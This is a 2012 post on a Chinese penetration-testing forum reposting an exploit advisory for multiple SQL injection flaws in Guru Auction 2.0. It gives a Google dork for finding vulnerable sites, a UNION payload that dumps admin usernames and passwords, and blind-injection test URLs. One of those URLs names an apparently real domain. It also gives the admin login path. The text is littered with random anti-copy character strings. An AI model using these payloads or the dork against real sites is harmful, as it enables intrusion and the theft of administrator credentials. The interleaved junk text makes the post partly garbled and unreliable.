找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 Guru Auction 2.0多重sql注射
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2141|回复: 0
打印 上一主题 下一主题

Guru Auction 2.0多重sql注射

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-12-31 09:24:05 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Guru Auction 2.0 Multiple SQL Injection Vulnerabilities
5 I8 [+ ]6 [1 u! c/ S! s! A% D8 g( ^& e. m( u1 P9 @2 T
作者     : v3n0m, ]- c9 E6 C) l, u. H
应用 : Guru Auction 2.07 @' ]3 v  S0 W8 n* S
Price       : $49) p/ f. x- _; ~  }4 E5 V
Vendor      : http://www.guruscript.com/5 d+ t2 u! b, Q
Google Dork : inurl:subcat.php?cate_id=
; }  n. \7 n7 T( L9 ]* D+ a 1 t8 R$ F" @1 g5 B
SQLi p0c:
4 e9 I: M" L" N3 g, d~~~~~~~~~~
  c9 I/ d) R$ \, ?6 Nhttp://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--& p) d; g% @4 @% O( H

8 u4 y7 P. U! O( j
& M) w6 w; m$ \0 Y. k盲注 p0c:
2 }9 @& x1 E- K7 t~~~~~~~~~~
  ^8 T+ e$ L8 R( V& T& z! t0 O9 `http://www.political-security.com /[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true
/ I) d; Q: o- _* [8 Z3 E: @http://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false
7 K  p" j1 S/ u
" j; p' z% h1 J% }8 l( j% K管理登录入口:5 X! ]+ I% d7 O+ a: A
~~~~~~~~~~) ^! ^$ C4 M; W. S% d
http://domain.tld/[path]/admin/) L$ p$ k+ e3 {; y/ R3 A
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表